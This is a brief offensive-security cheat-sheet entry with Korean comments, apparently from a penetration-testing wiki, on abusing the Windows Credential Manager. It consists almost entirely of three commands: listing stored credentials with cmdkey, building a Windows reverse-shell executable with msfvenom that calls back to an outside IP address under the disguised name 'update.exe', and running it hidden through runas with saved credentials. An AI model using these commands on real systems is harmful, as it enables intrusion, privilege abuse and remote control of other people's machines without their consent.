Credential Manager
Last updated
Last updated
# 저장된 자격 증명 열거
cmdkey /list
# 리버스쉘 실행 파일 생성 및 전달
msfvenom -a x64 -p windows/x64/shell_reverse_tcp LHOST=222.112.24.168 LPORT=10002 -f exe -o update.exe
# 저장된 정보를 통해 서비스 이용
runas /user:mick3y /savecred "powershell.exe -WindowStyle Hidden -Command Start-Process 'C:\Users\Mick3y\update.exe'"